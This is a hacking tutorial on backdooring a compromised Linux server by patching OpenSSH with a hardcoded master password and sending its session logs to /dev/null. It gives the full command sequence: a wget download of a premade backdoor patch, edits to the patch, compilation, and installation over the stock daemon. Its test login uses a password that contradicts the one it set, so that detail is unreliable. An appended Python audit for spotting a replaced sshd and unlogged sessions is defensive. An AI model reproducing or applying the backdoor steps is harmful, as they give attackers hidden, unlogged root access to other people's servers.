
Hello guys,

In this tutorial I will be talking about some advanced system backdooring. I mean, after gaining root on a server, many people will create a new root user; others will bind a root shell to a port and come back to it later. Those methods work perfectly, but they are easily detected through logs, or just by watching open ports or /etc/passwd.

Some other people use rootkits, which are widely detected by anti-malware, or are difficult to set up.

In this tutorial I will show you how to make the easiest and (kinda) undetectable backdoor.

What you need:

-Root access to a server
-Knowledge of Linux systems
-Patience and skills

Introduction:

The idea is to modify the OpenSSH binary so that you can:

-Log in with your own custom password
-Leave no logs of your activity

OPENSSH

I will start by explaining what OpenSSH is.

OpenSSH is a client/server application that allows users to access a server securely and get a shell session. The reason for ‘secure’ is that SSH encrypts its session so that sniffers cannot read it. OpenSSH’s default port is 22, and the latest stable version is 5.9.
OpenSSH is used on the majority of Linux servers.
Official URL: http://www.openssh.org

Backdooring:

In this phase I will explain how to ‘hijack’ the authentication method.
We will change the source code to include a master password that will spawn a secure shell.
The important files we need to modify are:

# includes.h — adding our password.
# auth-passwd.c — adding a custom backdoor and implementing the password.
# auth-pam.c — in this file we add some code for when PAM authentication is used.
# log.c and loginrec.c — no logs for our user.

In this tutorial I won’t show which code we need to add; instead we will use a premade patch.

Workaround:

1- First we need to know which SSH version is running on the target

# ssh -V
OpenSSh 5.5p1

So in my case I have OpenSSH 5.5p1.

2- Now I will download this version’s source code from here:
http://ftp3.usa.openbsd.org/pub/Open…nSSH/portable/
http://ftp3.usa.openbsd.org/pub/Open…h-5.5p1.tar.gz
3- Now we need to untar the source code:

# tar zxvf openssh-5.5p1.tar.gz

4- Let’s download the OpenSSH backdoor patch

# wget http://dl.packetstormsecurity.net/crypt/ssh/openssh/openssh-5.5p1.patch.tar.gz
# tar zxvf openssh-5.5p1.patch.tar.gz
# cp openssh-5.5p1.patch/sshbd5.5p1.diff openssh-5.5p1/

5- Let’s modify the patch

# cd openssh-5.5p1/
# nano sshbd5.5p1.diff

Notice these lines:

+#define ILOG "/tmp/ilog"
+#define OLOG "/tmp/olog"
+#define SECRETPW "apaajaboleh"

I will change them to:

+#define ILOG "/dev/null"
+#define OLOG "/dev/null"
+#define SECRETPW "th3breacher"

This means all input and output logs will be redirected to /dev/null, and the secret password is set to th3breacher.

6- Let’s patch it

# patch < sshbd5.5p1.diff

The patch is applied.

7- Configuring and installing the newly patched OpenSSH daemon

# ./configure --prefix=/usr --sysconfdir=/etc/ssh
# make
# make install && service sshd restart (for Red Hat and CentOS)
# make && make install && service ssh restart (Debian/Ubuntu)

I meant to chain two commands together at a time because, while the new daemon is being installed, the SSH connection will be interrupted and you can’t connect back afterwards; restarting the service in the same command solves this issue.

8- Let’s test it out

Localmachine : # ssh root@targetip
root@targetip password: r00tw0rm

Bingo, you are logged in, and nothing was logged nor will be logged.
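From the defender’s side, the two properties this walkthrough relies on (a rebuilt sshd binary that replaced the packaged one, and sessions that leave no auth-log entry) are exactly the two things to check for. Below is an added example written for this page, not code from the original post or from OpenSSH: a small Python audit that (1) compares the sshd binary against a recorded baseline hash and (2) correlates established port-22 sessions with “Accepted” lines in the auth log, flagging any session the daemon never recorded. The baseline value, the session list and the log excerpt are constructed samples so it runs offline; on a real host the baseline comes from the package manager (`rpm -V openssh-server`, `debsums openssh-server`) or a golden image, and the session list from `ss -tn state established '( sport = :22 )'` (parsing of that output is assumed, not shown).

```python
"""Audit helpers for spotting a replaced sshd and logins it did not record.

Added example, not from the original post. Two independent checks:
  1. File integrity: the sshd binary's SHA-256 must equal a baseline recorded
     at deployment time and kept off-host (a constructed value is used here).
  2. Session/log correlation: every established connection to port 22 should
     have a matching "Accepted" line in the auth log. A daemon patched to log
     to /dev/null leaves sessions with no such line.
All inputs below are constructed samples so the script runs offline.
"""
import hashlib
import re


def sha256_bytes(data):
    """Hex SHA-256 of an in-memory blob (used for the offline test data)."""
    return hashlib.sha256(data).hexdigest()


def sha256_file(path):
    """Hex SHA-256 of a file on disk, read in chunks (e.g. /usr/sbin/sshd)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def binary_matches_baseline(data, baseline_hex):
    """True when the binary's digest equals the recorded baseline."""
    return sha256_bytes(data) == baseline_hex.lower()


# Successful-authentication line as written by a stock sshd, e.g.
#   sshd[2231]: Accepted publickey for deploy from 10.0.0.5 port 51122 ssh2
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)


def logged_logins(auth_log):
    """Return the (peer ip, peer port) pairs for which sshd logged an Accepted line."""
    found = set()
    for line in auth_log.splitlines():
        m = ACCEPTED_RE.search(line)
        if m:
            found.add((m.group("ip"), int(m.group("port"))))
    return found


def silent_sessions(sessions, auth_log):
    """Established SSH sessions that no Accepted line in the auth log accounts for."""
    logged = logged_logins(auth_log)
    return sorted(s for s in sessions if s not in logged)


# Constructed sample: peers of established TCP connections on local port 22,
# as one would collect from `ss -tn state established '( sport = :22 )'`.
SAMPLE_SESSIONS = [("10.0.0.5", 51122), ("10.0.0.9", 40210), ("192.0.2.77", 60001)]

# Constructed auth-log excerpt: two of the three sessions were recorded, one was not.
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:12 web1 sshd[2231]: Accepted publickey for deploy from 10.0.0.5 port 51122 ssh2
Mar  3 10:01:12 web1 sshd[2231]: pam_unix(sshd:session): session opened for user deploy by (uid=0)
Mar  3 10:07:45 web1 sshd[2302]: Accepted password for ops from 10.0.0.9 port 40210 ssh2
Mar  3 10:09:03 web1 sshd[2350]: Failed password for root from 203.0.113.4 port 41888 ssh2
"""


if __name__ == "__main__":
    for ip, port in silent_sessions(SAMPLE_SESSIONS, SAMPLE_AUTH_LOG):
        print(f"ALERT: established SSH session from {ip}:{port} with no Accepted entry in the auth log")
    # Real-host usage (hypothetical baseline value, not from this page):
    # if sha256_file("/usr/sbin/sshd") != BASELINE_SHA256: raise SystemExit("sshd differs from baseline")
```

Two design points: the integrity baseline is only useful if it is stored somewhere root on the audited host cannot rewrite it, so package-manager verification or a hash list kept on the monitoring side is the practical source; and the session correlation should consume logs that were forwarded to a central syslog at write time, since the local file is precisely what a patched daemon suppresses. The correlation also catches the “no logs” property independently of how the binary was altered, which is why it complements rather than duplicates the hash check.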

#END
